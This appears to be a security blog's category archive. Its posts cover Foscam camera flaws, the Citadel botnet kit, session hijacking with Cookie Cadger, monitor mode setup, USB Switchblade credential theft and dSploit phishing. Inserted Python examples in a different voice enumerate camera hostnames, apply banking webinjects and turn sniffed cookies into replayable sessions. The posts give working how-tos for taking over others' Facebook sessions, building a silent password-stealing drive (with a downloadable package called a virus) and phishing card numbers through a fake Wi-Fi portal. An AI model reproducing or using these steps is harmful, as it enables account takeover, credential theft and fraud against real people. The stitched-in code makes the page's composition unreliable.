Category Archives: security

Many Internet Connected Security Cameras are Open to Remote Exploit

Thousands of wireless IP cameras connected to the Internet have serious security weaknesses that allow attackers to hijack them and alter their firmware, according to two researchers from security firm Qualys.

The cameras are sold under the Foscam brand in the U.S., but the same devices can be found in Europe and elsewhere with different branding, said Qualys researchers Sergey Shekyan and Artem Harutyunyan, who analyzed the security of the devices and are scheduled to present their findings at the Hack in the Box security conference in Amsterdam on Thursday.

Tutorials provided by the camera vendor contain instructions on how to make the devices accessible from the Internet by setting up port-forwarding rules in routers. Because of this, many such devices are exposed to the Internet and can be attacked remotely, the researchers said.

Finding the cameras is easy and can be done in several ways. One method involves using the Shodan search engine to search for an HTTP header specific to the Web-based user interfaces of the cameras. Such a query will return more than 100,000 devices, the researchers said.

The vendors selling these cameras also have them configured to use their own dynamic DNS services. For example, Foscam cameras get assigned a hostname of the type [two letters and four digits].myfoscam.org. By scanning the entire *.myfoscam.org name space an attacker could identify most Foscam cameras connected to the Internet, the researchers said.
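The namespace walk described above, as an added example that is not part of the article or the researchers' work: the two-letters-plus-four-digits shape is the one quoted in the article, while restricting the letters to lower-case a-z and the two sample DNS records are assumptions made here so the code runs offline. The same regular expression is useful on the defensive side, for spotting these names in your own DNS query logs.

```python
import itertools
import re
import socket
import string
from typing import Callable, Dict, Iterable, Iterator, Optional

# Hostname shape quoted in the article: two letters, four digits, then the vendor's
# dynamic-DNS zone. Restricting the letters to lower-case a-z is an assumption.
DDNS_ZONE = "myfoscam.org"
DDNS_NAME = re.compile(r"^[a-z]{2}\d{4}\." + re.escape(DDNS_ZONE) + r"$", re.IGNORECASE)


def is_ddns_name(hostname: str) -> bool:
    """True if hostname matches the <aa><nnnn>.myfoscam.org pattern (handy on DNS logs)."""
    return DDNS_NAME.match(hostname.strip().rstrip(".")) is not None


def namespace_size() -> int:
    """Full size of the namespace: 26 * 26 letter pairs times 10,000 numbers."""
    return 26 * 26 * 10 ** 4


def candidate_hostnames(prefixes: Optional[Iterable[str]] = None) -> Iterator[str]:
    """Yield every name in the namespace, or only those under the given two-letter prefixes."""
    if prefixes is None:
        prefixes = ("".join(p) for p in itertools.product(string.ascii_lowercase, repeat=2))
    for prefix in prefixes:
        for number in range(10 ** 4):
            yield f"{prefix}{number:04d}.{DDNS_ZONE}"


def socket_resolver(hostname: str) -> Optional[str]:
    """Real resolver: an IPv4 address, or None when the name does not exist."""
    try:
        return socket.gethostbyname(hostname)
    except socket.gaierror:
        return None


def enumerate_live(resolve: Callable[[str], Optional[str]],
                   prefixes: Optional[Iterable[str]] = None) -> Dict[str, str]:
    """Walk the namespace with `resolve` and keep the names that have an address."""
    live: Dict[str, str] = {}
    for name in candidate_hostnames(prefixes):
        address = resolve(name)
        if address:
            live[name] = address
    return live


# Constructed stand-in for the vendor zone so the example runs offline; both records are invented.
FAKE_ZONE = {
    "ab0001.myfoscam.org": "198.51.100.7",
    "ab9876.myfoscam.org": "203.0.113.42",
}


def fake_resolver(hostname: str) -> Optional[str]:
    return FAKE_ZONE.get(hostname)


if __name__ == "__main__":
    print(f"names to check: {namespace_size():,}")
    # Offline demo over one prefix (10,000 names); pass socket_resolver to query real DNS.
    for name, address in enumerate_live(fake_resolver, prefixes=["ab"]).items():
        print(name, address)
```

The full space is 6,760,000 names, so a real walk with socket_resolver is a matter of hours of serial lookups and would normally be spread over a thread pool with a rate limit; the point of the injectable resolver is that the enumeration logic can be tested without touching anyone's DNS.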

Around two out of every 10 cameras allow users to log in with the default “admin” user name and no password, the researchers said. For the rest that do have user-configured passwords, there are other ways to break in.

One method is to exploit a recently discovered vulnerability in the camera’s Web interface that allows remote attackers to obtain a snapshot of the device’s memory.

This memory dump will contain the administrator user name and password in clear text along with other sensitive information like Wi-Fi credentials or details about devices on the local network, the researchers said.

Even though the vendor has patched this vulnerability in the latest firmware, 99% of Foscam cameras on the Internet are still running older firmware versions and are vulnerable, they said. There is also a way to exploit this vulnerability even with the latest firmware installed if you have operator-level credentials for the camera.

Another method is to exploit a cross-site request forgery (CSRF) flaw in the interface by tricking the camera administrator into opening a specially crafted link while logged in. Because the camera accepts the request on the strength of the administrator's browser session alone, with no anti-CSRF token, this can be used to add a secondary administrator account to the camera.

Citadel: The Thoroughbred of Cyber Crime

In ancient times, a citadel was a fortress used as the last line of defense. For cyber criminals, it is a powerful, state-of-the-art toolkit used both to distribute malware and to manage infected computers (bots). Citadel is an offspring of the (too) popular Zeus crimekit, whose main goal is to steal banking credentials by capturing keystrokes and taking screenshots or videos of victims' computers. Citadel appeared on underground forums around January 2012 and quickly became a popular choice for criminals. A version of Citadel (1.3.4.5) was leaked in late October, and although it is not the latest (1.3.5.1), it gives a good insight into the tools the bad guys use to make money.

In this post, I will show you how criminals operate a botnet. This is not meant as a tutorial and I do want to stress that running a botnet is illegal and could send you to jail.

A nice home

To get into business, the bad guys need a server hosted by a company that will turn a blind eye to their activities and also guarantee them some anonymity. Such companies are known as bulletproof hosting providers and are advertised on most underground forums.

Those hosting firms are for the most part located in countries such as China or Russia, where, so long as you do not commit crimes against your own people, not a whole lot can happen to you. To cover their tracks further, the bad guys reach the server through proxy or VPN services that disguise their own IP address.

A shiny new toy

Once set up with a server, it is time to install what will be the mastermind program to create and organize an entire array (botnet) of infected computers worldwide. A variety of crimekits exist but in this post we will concentrate on Citadel.

Once again, the core installation files can be found in the underground community or through your own connections. Recently, the Citadel kit was withdrawn from forums to prevent too much exposure and attention. It costs around $3000 USD.

To install Citadel, you simply browse to the install folder with your browser and set up the main access username and password as well as database information.

In this test, the installer did not create the database automatically, but you can do so by hand. To reach the login page, browse to the cp.php file.

Before logging in, I want to show you the other component that makes this package complete. It is called the builder and is used to create the piece of malware that criminals distribute (forced installs through infected websites) and that reports back to their crimekit.

Stolen credentials are harvested by various means:

  • Keystroke logging
  • Screenshot capture
  • Video capture

A powerful feature used to trick users into revealing confidential information is dubbed WebInject. It is powerful because it happens in real time and is completely seamless. A WebInject is a piece of HTML and JavaScript that the bot splices into a web page as the browser loads it, typically creating a fake pop-up or extra form fields that ask the victim for personal information in the context of logging into a site. The bad guys can trigger it in two ways: automatically when the victim opens a site of interest, or manually on the fly.

It is the ultimate phishing tool because it defeats the precautions a careful user normally takes. The site's URL is unchanged and the browser still shows the padlock with the financial institution's SSL certificate, because the page really did come from the bank and was altered only after it was decrypted inside the victim's browser. This type of attack is known as a man-in-the-browser attack (a man-in-the-middle that sits inside the browser rather than on the network). Many times this kind of attack doesn't work as users get suspicious. Ransomware works much better in my opinion.
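To make the mechanism concrete, here is an added example (not code from the post or from the Citadel kit) that parses the text-based webinject configuration format the Zeus family uses, which Citadel inherited, and applies it to a page the way the bot does between decryption and rendering: a set_url line with a URL mask and G/P flags, then data_before, data_inject and data_after blocks each closed by data_end. The bank name, page markup and field names are constructed for the demo; the reading that an empty data_after means "insert after data_before" while a non-empty one means "replace everything in between" follows the common documentation of that format.

```python
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class WebInject:
    """One rule: which URLs it fires on and what gets spliced into the page."""
    url_mask: str        # '*' is the wildcard, e.g. https://www.bank.example/login*
    flags: str           # G = apply to GET responses, P = apply to POST responses
    before: str = ""     # text in the genuine page after which the injection starts
    inject: str = ""     # attacker-supplied HTML/JavaScript
    after: str = ""      # if set, everything between `before` and `after` is replaced


def parse_webinjects(text: str) -> List[WebInject]:
    """Parse the set_url / data_before / data_inject / data_after / data_end layout."""
    rules: List[WebInject] = []
    current: Optional[WebInject] = None
    section: Optional[str] = None
    buf: List[str] = []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("set_url"):
            parts = line.split()
            current = WebInject(url_mask=parts[1], flags=parts[2] if len(parts) > 2 else "G")
            rules.append(current)
        elif line in ("data_before", "data_inject", "data_after"):
            section, buf = line[len("data_"):], []
        elif line == "data_end":
            if current is not None and section is not None:
                setattr(current, section, "\n".join(buf))
            section = None
        elif section is not None:
            buf.append(raw)
    return rules


def _mask_to_regex(mask: str) -> "re.Pattern":
    """Only '*' is special in the format; everything else matches literally."""
    return re.compile(".*?".join(re.escape(part) for part in mask.split("*")), re.S)


def apply_webinjects(url: str, method: str, html: str, rules: List[WebInject]) -> str:
    """Rewrite the genuine response the way the bot does before the browser renders it."""
    for rule in rules:
        if method[:1].upper() not in rule.flags.upper():
            continue
        if not _mask_to_regex(rule.url_mask).fullmatch(url):
            continue
        if not rule.before:
            continue  # a rule with no anchor has nowhere to go
        anchor = _mask_to_regex(rule.before).search(html)
        if not anchor:
            continue
        start = end = anchor.end()
        if rule.after:
            closer = _mask_to_regex(rule.after).search(html, start)
            if not closer:
                continue
            end = closer.start()
        html = html[:start] + rule.inject + html[end:]
    return html


# Constructed config and pages (invented bank name and field names) so this runs offline.
SAMPLE_CONFIG = """
set_url https://www.bank.example/login* GP
data_before
<input type="password" name="pass"*>
data_end
data_inject
<br><b>ATM PIN:</b> <input type="text" name="atm_pin">
data_end
data_after
data_end

set_url https://www.bank.example/account* G
data_before
<div id="notice">
data_end
data_inject
Your account has been verified.
data_end
data_after
</div>
data_end
"""

SAMPLE_LOGIN_PAGE = """<form action="/login" method="post">
<input type="text" name="user">
<input type="password" name="pass" maxlength="20">
<input type="submit" value="Sign in">
</form>"""

SAMPLE_ACCOUNT_PAGE = '<div id="notice">Never enter your PIN online.</div>'

if __name__ == "__main__":
    rules = parse_webinjects(SAMPLE_CONFIG)
    print(apply_webinjects("https://www.bank.example/login", "GET", SAMPLE_LOGIN_PAGE, rules))
    print(apply_webinjects("https://www.bank.example/account", "GET", SAMPLE_ACCOUNT_PAGE, rules))
```

Nothing in the rewritten page betrays the change to the user: the form still posts to the bank, so the extra PIN field rides along with the genuine login, and the second rule shows how a security warning the bank put on the page can be silently replaced.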

Citadel botnets are also used to push ransomware, such as the FBI Moneypak lock screen discussed below. Since a lot of people download music and movies from torrents or other shady sites, the ransom message tricks them into thinking they have been caught by the local authorities. It is a very smart scare tactic, and it works quite well, unfortunately. To add to the drama, the malware will attempt to turn on the user's webcam, as if they were already under surveillance.

The FBI has posted an article regarding this scam (http://www.fbi.gov/news/stories/2012/august/new-internet-scam) and urges people not to pay any money, as it could get you into even more trouble.

Malwarebytes users are protected against the FBI Moneypak malware. If you aren’t one of them and are already infected you can remove this ransomware by following these 3 steps:

  1. Reboot your computer into Safe Mode with Networking (Microsoft publishes instructions for this).
  2. Download Malwarebytes Anti-Malware.
  3. Run Malwarebytes Anti-Malware and remove everything it finds.

What’s next for Citadel?

The latest version (1.3.5.1) whose code name is Rain Edition is getting pricey at $3931 but it includes a lot of valuable features (advanced support for Chrome and Firefox, improved WebInjects, smarter ‘on-the-fly’ updates to the Trojan, etc…).

The makers of Citadel are trying to keep a low enough profile to avoid gathering too much attention which could result in efforts to go after them (as we have seen with Zeus). Getting your hands on Citadel is more difficult because of a stricter validation process within the Russian underground.

How to protect yourself

When seeing such technically advanced crimekits it puts a lot of things into perspective. The methods used to steal personal information are so advanced and sneaky that even the most cautious user may get fooled. It is best to avoid infection in the first place by using a solution such as Malwarebytes Anti-Malware PRO that constantly protects your computer by blocking malicious sites and files. Using a combination of both safe online practices (if you ever feel uncomfortable disclosing personal information, give your bank a call or ask a friend) and a good anti malware solution will keep you safe(r).

A Study On Russian Cyber Crime

As we all know, a lot of the crime that happens on the Internet originates in Russia, mostly because of Russia's rather relaxed approach to enforcing any laws on Internet interactions. With the relative lack of control over what goes on online in Russia, a large underground network for cyber criminals has developed. They sell some perfectly normal things: VPNs, bulletproof VPSes and dedicated servers. But also on the market are botnets, DDoS attacks, rootkits and other pretty sketchy stuff.

Reading about it is rather interesting; you begin to see how you could relatively cheaply DDoS anyone you want, or even have custom rootkits made specially for you. It kind of scares me that if I were to make someone mad, how easy it would be for them to screw up my life, as long as they knew where to look.

If you're interested in learning more about how Russian cyber crime works, Trend Micro has a great white paper on the subject. If you don't want to find it on their site, you can just download it.

Using Cookie Cadger for Live Packet Capture

I'm very sorry I wasn't able to get to this sooner; I know I said I would write one. But now I'm home and I'm going to write a guide to capturing your first cookies with Cookie Cadger. If you haven't already downloaded Cookie Cadger, do so now. Cookie Cadger is a Java package, so you will also need Java 7 installed as well as the Wireshark command-line tool tshark. If you have Wireshark installed, tshark is usually installed too; if it isn't, install it from whatever package manager you use.

The next step before you open up Cadger is to set your card into monitor mode. I wrote a guide that should work for almost every wireless card on the market, but if my guide doesn't work, a little bit of Googling should find one that works for your card. Once your card is in monitor mode, open the CookieCadger.jar package. Note: some users have reported Cadger not recognizing capture devices. This can be solved by running Cadger as root, since capturing on a raw interface needs those privileges.

When you open up Cadger you will first be presented with a little bit of text. It asks whether you want it to automatically begin capturing traffic when the real program starts up, and it also informs you about the legality of what you are about to do. I believe that in the United States at least it is legal to capture insecure traffic. Correct me if I'm wrong. Anyway, click Yes.

Once you click Yes, another screen will load. The first thing to select is the interface you want to capture cookies on. Cadger lists whatever interface you have set into monitor mode: if you set eth0, choose eth0; if you set wlan0, choose wlan0.

If you selected the correct interface (for example eth0), you should start seeing insecure cookies as long as you are on a network with people using the Internet. Click on the Recognized Sessions tab, find a cookie that you like (Facebook is a good one to start with) and open the cookie in your browser.

The cookie will load and you will have access to the person's Facebook account. There is a lot more potential behind Cookie Cadger than just breaking into people's Facebook accounts. Play around with Cadger a bit and you'll find it's a really great tool. Use your newfound powers wisely.

Note: using Cadger is exactly the same on any OS; only command-line mode may differ. The only other difference is how you get your card into monitor mode. We have a guide for Linux and a guide for Mac; a guide for Windows is in the works.

If you have any questions or something I need to add tell me in the comments.
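What Cookie Cadger does behind its GUI is drive tshark over the monitor-mode interface and turn the plain-HTTP requests it sees into a per-client, per-site "recognized sessions" list. The following is an added example (not Cookie Cadger's code and not from the post) that does the same with the tshark field output: the tshark invocation uses only documented options and fields (ip.src, http.host, http.request.uri, http.cookie), and the captured lines, hostnames and cookie values are constructed so it runs offline.

```python
import subprocess
import sys
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

# Fields asked of tshark, in the order they appear in each tab-separated output line.
TSHARK_FIELDS = ["ip.src", "http.host", "http.request.uri", "http.cookie"]


def tshark_command(interface: str, duration: int = 60) -> List[str]:
    """tshark invocation printing one tab-separated line per plain-HTTP request on `interface`."""
    cmd = ["tshark", "-i", interface, "-l", "-a", f"duration:{duration}",
           "-Y", "http.request", "-T", "fields"]
    for name in TSHARK_FIELDS:
        cmd += ["-e", name]
    return cmd


def parse_cookie_header(header: str) -> Dict[str, str]:
    """Split 'a=1; b=2' into a dict; values are kept verbatim (no URL-decoding)."""
    cookies: Dict[str, str] = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name:
            cookies[name] = value
    return cookies


Session = Tuple[str, str]  # (client IP, Host header)


def sessions_from_tshark(lines: Iterable[str]) -> Dict[Session, Dict[str, str]]:
    """Merge every cookie a client sent to a host: the 'recognized sessions' view."""
    sessions: Dict[Session, Dict[str, str]] = defaultdict(dict)
    for line in lines:
        fields = line.rstrip("\r\n").split("\t")
        if len(fields) < len(TSHARK_FIELDS):
            continue
        src, host, _uri, cookie = fields[:4]
        if not cookie:
            continue  # no cookie on the wire, so nothing to replay
        sessions[(src, host)].update(parse_cookie_header(cookie))
    return dict(sessions)


def replay_headers(session: Session, cookies: Dict[str, str]) -> Dict[str, str]:
    """Headers a browser would need to present the captured session as its own."""
    _, host = session
    return {"Host": host, "Cookie": "; ".join(f"{k}={v}" for k, v in cookies.items())}


# Constructed tshark output (invented hosts and cookie values) so the example runs offline.
SAMPLE_TSHARK_OUTPUT = [
    "192.168.1.23\twww.social.example\t/home.php\tc_user=100001234; xs=6%3Aabc123%3A2",
    "192.168.1.23\twww.social.example\t/ajax/presence\tc_user=100001234; xs=6%3Aabc123%3A2; presence=online",
    "192.168.1.40\tnews.example\t/\t",
    "192.168.1.40\tshop.example\t/cart\tPHPSESSID=8f3a1c9d0b",
]

if __name__ == "__main__":
    if len(sys.argv) > 1:  # python3 sessions.py wlan0  (interface in monitor mode, run as root)
        proc = subprocess.run(tshark_command(sys.argv[1]), capture_output=True, text=True)
        lines: Iterable[str] = proc.stdout.splitlines()
    else:
        lines = SAMPLE_TSHARK_OUTPUT
    for session, jar in sessions_from_tshark(lines).items():
        print(session, replay_headers(session, jar))
```

Two things the sample makes visible: the request to news.example carried no cookie at all and so never becomes a session, and the social-site session is assembled from several requests, which is why a single captured packet is rarely the whole story. Only plaintext HTTP is parsed this way; the same cookies sent over HTTPS are not visible to tshark, which is exactly why sites mark session cookies Secure.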

Cookie Cadger Is Free! But How Do I Use It?

Cookie Cadger is now free, but I've had some people asking how to set your card into monitor mode, which is a requirement for Cookie Cadger. Before you download Cookie Cadger and set your card into monitor mode, you will need Java 7 installed as well as a package called tshark, normally part of the Wireshark package (though I had to install it separately from my package manager). I know you asked for a guide to using Cookie Cadger; I hope you can get by with just a guide to monitor mode until I get home. You can now use the Cadger guide for basic capture. For Mac users I've written a guide to setting your card into monitor mode; the usage of Cookie Cadger is exactly the same on any OS.

The first step, for Cookie Cadger or any other tool that needs raw 802.11 frames, is to put your wireless network card into monitor mode. For this we will use ifconfig and iwconfig. These instructions may not work for your card; I will explain how to set it up with Atheros chipset cards in a separate post. This is for Broadcom or RT2500 and most other stock cards.

Step 1: Open a shell
Now we want to see what the cards installed on our computer are known as.

Step 2: At the prompt type iwconfig
You will see something like this:

lo no wireless extensions

eth0 IEEE 802.11b/g ESSID:Off/any Nickname: "Broadcom 4311"

Mode: Managed Frequency=2.437 GHz...

Disregard the 'lo' entry. Your card is one of the other interfaces listed; in my case it is known as 'eth0', yours could also be known as 'wlan0'. As we can see on the second line, the card is currently in managed mode, and we must get it into monitor mode.

We also need our card to be “UP”. To check the up and down status, we use:

ifconfig

The results should show your card, and the second line of the card's information should start with 'UP'. If your card is not shown, or is shown without the word 'UP', we must bring it up. If you're not sure, you can bring it up anyway and no harm is done. Here's how:

ifconfig eth0 up

Now type ifconfig again and you should see your card and marked as up.

iwconfig eth0 mode monitor

In case you couldn't tell, this places the card into monitor mode. Running iwconfig again should now show the mode as Monitor. Some drivers refuse to change mode while the interface is up; if you get an error here, run ifconfig eth0 down, repeat the iwconfig command, then ifconfig eth0 up.

If you followed these steps correctly you should be able to start up Cookie Cadger, Aircrack or anything else that requires monitor mode and it should work exactly how you want it to. I'm writing this from my phone, but I'll post some screenshots later on. If you have any questions, ask them in the comments.
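The procedure above has two checks in it (is the card wireless at all, is it already UP) before the two commands. As an added example, not part of the post, here is a small Python helper that parses iwconfig and ifconfig output the way the post reads it by eye and works out which of the post's commands are still needed. The sample outputs are constructed in the net-tools layout the post shows, with an invented MAC address; it also accepts the newer "flags=...<UP,...>" ifconfig layout.

```python
import re
import subprocess
import sys
from typing import Dict, List, Optional, Set

# Constructed output in the shape the post shows (net-tools style); the MAC address is invented.
SAMPLE_IWCONFIG = """lo        no wireless extensions.

eth0      IEEE 802.11b/g  ESSID:off/any  Nickname:"Broadcom 4311"
          Mode:Managed  Frequency=2.437 GHz  Access Point: Not-Associated
"""

SAMPLE_IFCONFIG = """eth0      Link encap:Ethernet  HWaddr 00:11:22:33:44:55
          BROADCAST MULTICAST  MTU:1500  Metric:1

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
"""


def wireless_modes(iwconfig_output: str) -> Dict[str, str]:
    """Map each wireless interface to its Mode; 'no wireless extensions' entries are skipped."""
    modes: Dict[str, str] = {}
    current: Optional[str] = None
    for line in iwconfig_output.splitlines():
        if line and not line[0].isspace():          # a new interface block starts in column 0
            current = None if "no wireless extensions" in line else line.split()[0]
        if current is not None:
            found = re.search(r"Mode:\s*(\w+)", line)
            if found:
                modes[current] = found.group(1)
    return modes


def up_interfaces(ifconfig_output: str) -> Set[str]:
    """Interfaces whose flags include UP; handles 'UP BROADCAST' and 'flags=...<UP,...>' styles."""
    up: Set[str] = set()
    current: Optional[str] = None
    for line in ifconfig_output.splitlines():
        if line and not line[0].isspace():
            current = line.split()[0].rstrip(":")
        if current is not None and re.search(r"\bUP\b", line):
            up.add(current)
    return up


def monitor_mode_plan(iface: str, iwconfig_output: str, ifconfig_output: str) -> List[List[str]]:
    """The commands from the post that are still needed, given the current state."""
    modes = wireless_modes(iwconfig_output)
    if iface not in modes:
        raise ValueError(f"{iface}: no wireless extensions")
    plan: List[List[str]] = []
    if iface not in up_interfaces(ifconfig_output):
        plan.append(["ifconfig", iface, "up"])
    if modes[iface].lower() != "monitor":
        plan.append(["iwconfig", iface, "mode", "monitor"])
    return plan


def run_plan(plan: List[List[str]]) -> None:
    """Execute the plan; needs root. Some drivers only change mode while the interface is
    down, in which case bring it down, run the iwconfig step, then bring it up again."""
    for cmd in plan:
        subprocess.run(cmd, check=True)


if __name__ == "__main__":
    if len(sys.argv) > 1:                           # python3 monitor.py wlan0
        iface = sys.argv[1]
        iw = subprocess.run(["iwconfig"], capture_output=True, text=True)
        ifc = subprocess.run(["ifconfig", "-a"], capture_output=True, text=True)
        # iwconfig reports "no wireless extensions" on stderr, so read both streams.
        print(monitor_mode_plan(iface, iw.stdout + iw.stderr, ifc.stdout))
    else:                                           # dry run on the sample output above
        print(monitor_mode_plan("eth0", SAMPLE_IWCONFIG, SAMPLE_IFCONFIG))
```

On the sample output the plan is both commands, because eth0 is wireless, down and in Managed mode; once the card reports Mode:Monitor and UP, the plan is empty, which is the check the post tells you to make by running iwconfig a second time.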

USB Drives for Penetration Testing

USB Penetration Testing

USB ports are some of the most vulnerable parts of a computer; they exist on desktops, laptops and servers, and most of the time they are fully accessible to anyone with physical access to the machine. Personally, getting access to a USB port on a server, or even on a desktop linked to the target network, is a very high priority when I'm pen testing any company. Many times you only need access to a USB port once to gather enough information to compromise an organization.

USB Switchblade / Hacksaw

USB Switchblade is the product of Hak5 and the surrounding community, way back in 2006. It can capture and record information about the computer it is used on, including password hashes, IP information and auto-fill information, and some versions of Switchblade can create backdoors in the system for access at a later date.

To do this, Switchblade uses a U3 drive's ability to present a virtual CD-ROM drive, which is what lets autorun fire. It captures password hashes for later cracking, browser history (not Chrome history!) and any autofill information on the system, as well as product keys for any installed Windows products. Some versions can also create a ghost administrator account for later access. The biggest advantage of Switchblade is that all of this happens hands-free within a few seconds.

USB Rubber Ducky

USB Rubber Ducky is the next generation of Switchblade. Rather than relying on autorun, it presents itself to the host as a USB keyboard and types its payload, which you write in its own scripting language (Ducky Script). You can buy it pre-installed for $59, but the source code is also open. I'll be posting later about how to install it on a 3rd-party device (that post is now here). For now you can check it out on Hak5's store or download the source code from GitHub.

USB Keyloggers

I recently wrote an article about USB keyloggers and how a top executive found a suspicious USB device inserted between his keyboard and his computer. It turned out to be a hardware keylogger, and unless you are doing physical inspections of hardware they are nearly undetectable, since nothing runs on the host. Of course these loggers require regular access to the target machine to retrieve what they capture, and they are rather pricey, but they can really change the tide of a pen test.

The Best Option

I use USB Hacksaw or Switchblade depending on the kind of attack I am performing. It is by far the cheapest option and can give you tons of very valuable intel, as well as a discreetly installed backdoor with Switchblade.

Setting Up USB Switchblade

Picking a USB drive

I will be setting Switchblade up on a U3 drive because U3 drives can emulate a CD drive and automatically execute the Switchblade payload without any interaction beyond plugging it in, potentially allowing you to attack a locked computer (note that the test in step 9 below assumes a logged-in session with administrative rights, which is what the full payload needs).

These are the drives I will use to setup on. Two very unassuming drives that will draw little attention plugged into a target machine. But also with enough space to take a lot of information from several different computers.

Installing on the Drive

I've put together a package of everything you need to download. Switchblade is no longer maintained and is very difficult to find on the Internet, so before you start, download the package at the bottom of the page.

Once you have downloaded it, unzip it and follow the instructions exactly.

1. Unzip the NarwhaleUSB package you downloaded.

2.  Open the Switchblade folder.

3. Unzip the Universal Customizer to “C:\Universal_Customizer”

4. Unzip the -=GonZor=- Payload V2.1 to “C:\Payload”

5. Copy the file U3CUSTOM.ISO from C:\Payload to C:\Universal_Customizer\BIN replacing the old one.

6. Run C:\Universal_Customizer\Universal_Customizer.exe and plug in U3 smart drive.
– Select Accept and click Next.
– Close all U3 applications and any applications that access your U3 drive and click Next.
– Set a password for the backup zip file (Empty password not allowed)
– Click Next and it will start backing up data. Wait for the Universal Customizer to modify your CD partition and replace your files to the flash drive.
– The modification should now be complete, Unplug your U3 Drive and plug it back in

7. Copy “C:\Payload\SBConfig.exe” to the mass storage of the flash drive

8. Run SBConfig.exe from flash drive

– Select the check boxes of the Payload options you would like to use
– Enter your email address and password for the HackSaw if you wish to use it.
– Click “Update Config” button, a message box should appear to confirm this is completed
– Toggle between using the payload or not by clicking the “Turn PL On”/”Turn PL Off” button
– Toggle between using the U3 Launcher or not by clicking the “Turn U3 Launchpad On”/”Turn U3 Launchpad Off” button

9. You now have -=GonZor=- Payload V2.1 on your U3 smart drive, which can automatically steal passwords once it is plugged into a computer where the logged-in user has administrative privileges.

I've tested it and it's very scary, because when I plugged in the hacked U3 smart drive with the USB Switchblade payload, the payload ran silently and invisibly! It did not modify any system settings nor send any network traffic. A log file is created by the payload at F:\System\Logs\COMPUTERNAME (F: being the storage drive), and I was shocked to see my network configuration, router password, Windows Live Messenger password, Google Talk password, Gmail password, all Firefox passwords, Internet Explorer passwords, ICQ password, Windows product keys and so on recorded in that log file!

As you can see from this guide, USB drives can be very dangerous where network security is involved. I recommend securing all servers inside locked racks and regularly inspecting workstations as well as private and company laptops: basically any computer that may connect to the network you are attempting to secure. On the software side, the whole attack hangs on AutoRun; disabling it through Group Policy ("Turn off Autoplay" for all drives, which sets NoDriveTypeAutoRun to 0xFF) removes the trigger, and a reboot alone does not undo that. Have any tips for securing USB ports, or any tool you use for making your drives dangerous? Tell us in the comments.
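Since the U3 trick works by handing Explorer an autorun.inf on a virtual CD, the thing to look for when inspecting a suspicious drive is the autorun.inf itself: which directives in it would launch a program. Here is an added example, not from the post or from the Switchblade package, that parses an autorun.inf and reports the launch directives (open, shellexecute, and any shell\<verb>\command entry); both sample files are constructed, the first modelled on a U3 launcher entry and the second on a harmless driver CD.

```python
import configparser
import os
import sys
from typing import Dict, List, Optional

# [autorun] keys that make Explorer run something as soon as the volume appears; the
# shell\<verb>\command entries run when the drive is double-clicked or via the default verb.
LAUNCH_KEYS = ("open", "shellexecute")


def parse_autorun(text: str) -> Dict[str, str]:
    """The [autorun] section as a lower-cased key/value map; {} if absent or unparsable."""
    cp = configparser.ConfigParser(interpolation=None, allow_no_value=True,
                                   strict=False, delimiters=("=",))
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    section = next((s for s in cp.sections() if s.lower() == "autorun"), None)
    if section is None:
        return {}
    return {key.lower(): (value or "").strip() for key, value in cp.items(section)}


def launch_directives(autorun: Dict[str, str]) -> List[str]:
    """Every directive that would execute a program automatically or on double-click."""
    hits: List[str] = []
    for key, value in autorun.items():
        if not value:
            continue
        if key in LAUNCH_KEYS or (key.startswith("shell\\") and key.endswith("\\command")):
            hits.append(f"{key}={value}")
    return hits


def inspect_volume(mount_point: str) -> Optional[List[str]]:
    """Launch directives from <mount_point>/autorun.inf, or None when the volume has none."""
    for entry in os.listdir(mount_point):
        if entry.lower() == "autorun.inf":
            with open(os.path.join(mount_point, entry), "r", errors="replace") as fh:
                return launch_directives(parse_autorun(fh.read()))
    return None


# Constructed autorun.inf files: one modelled on a U3 launcher, one on a harmless driver CD.
SAMPLE_U3_AUTORUN = """[AutoRun]
open=LaunchU3.exe -a
icon=LaunchU3.exe,0
action=Run U3 Launchpad
shell\\open\\command=LaunchU3.exe -a
UseAutoPlay=1
"""

SAMPLE_BENIGN_AUTORUN = """[autorun]
icon=setup.exe,0
label=Driver CD
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(inspect_volume(sys.argv[1]))   # e.g. python3 autorun_check.py /media/usb
    else:
        print(launch_directives(parse_autorun(SAMPLE_U3_AUTORUN)))
```

The parser deliberately treats the section name and keys case-insensitively, because Windows does, and anything that fails to parse is reported as empty rather than raising, so a deliberately malformed file cannot crash an inspection sweep. Finding a launch directive is not proof of malice (every U3 drive ships with one); it tells you which drives would have executed code on a machine where AutoRun is still on.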

Downloads

NarwhalUSB Package – When you download it will show up as a virus. Because thats what it is.

Phishing Using Only an Android Phone

Recently evilsocket released an Android app called dSploit; it's basically a stripped-down version of Metasploit for Android. You can perform man-in-the-middle attacks and also scan for vulnerable operating systems. But the MITM attack that I think could be the best is the ability to redirect all traffic on a network to a web page. For example, you could go to a coffee shop, having beforehand written a legitimate-looking sign-in page for the target shop or public Wi-Fi network.
You join just like any other patron, open up dSploit and redirect all traffic to a fake login page served from your phone. Rather than just having guests sign in, you could also have them register and pay to get access to the Wi-Fi, so they unsuspectingly hand you their credit card numbers or logins to any site you choose. All you need is an Android phone or tablet and a few minutes to set the server up.

  • I will be using kWS for serving my fake login pages. You can download it from the Android store.
  • You will need to download dSploit from the developer's web page; I posted earlier about installing and using dSploit.

First you need to decide where your HTML page will be stored. Mine is going in /mnt/sdcard/publichtml; you can put yours anywhere.

Once you decide which directory to put your HTML in, click on Port and enter a port number. I went with 8888 because it is not normally blacklisted on public networks.

After you finish setting up the directory and port, place whatever HTML you want into the selected /publichtml folder. Once you do that, open up kWS and click on Run Server.

Hopefully you get a response from the server that looks exactly like this one; take note of your local IP address. If you don't, something is wrong with your setup: go back and make sure the server is looking for the HTML in the right place, and if that doesn't change anything, try again with a different port. Once it is running correctly, all you need to do is open up dSploit and it will scan the network you are attached to. Select 192.168.1.0/24, then select MITM and finally Redirect. Fill out the menu with your phone's local IP address (the one you noted when you started the web server) and whatever port the server is using.

